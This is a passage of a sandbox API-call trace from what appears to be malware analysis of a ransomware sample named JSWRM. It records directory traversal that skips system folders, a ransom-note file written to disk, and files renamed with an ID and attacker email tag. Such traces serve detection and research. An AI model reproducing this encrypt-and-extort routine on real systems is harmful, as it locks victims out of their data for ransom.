(lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.722] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.722] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.722] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.722] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.722] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.722] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.722] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.723] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.723] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.723] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.723] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.723] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.723] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10086026322367288) returned 0 [0068.723] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.723] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.723] CloseHandle (hObject=0xffffffff) returned 1 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0068.724] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.724] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.724] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2=".") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="..") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="...") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="windows") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="recovery") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="perflogs") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="documents and settings") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="$RECYCLE.BIN") returned 1 [0068.724] lstrcmpiW (lpString1="zh-TW", lpString2="system volume information") returned 1 [0068.725] lstrcmpiW (lpString1="zh-TW", lpString2="msocache") returned 1 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\jswrm-decrypt.hta")) returned 0xffffffff [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.726] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.726] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.727] CloseHandle (hObject=0x454) returned 1 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\jswrm-decrypt.hta")) returned 0x20 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.727] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2321c0 [0068.728] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.728] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.728] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.728] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.728] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa0714b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa0714b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa0714b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.728] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0daa01, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e0daa01, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.728] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.729] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 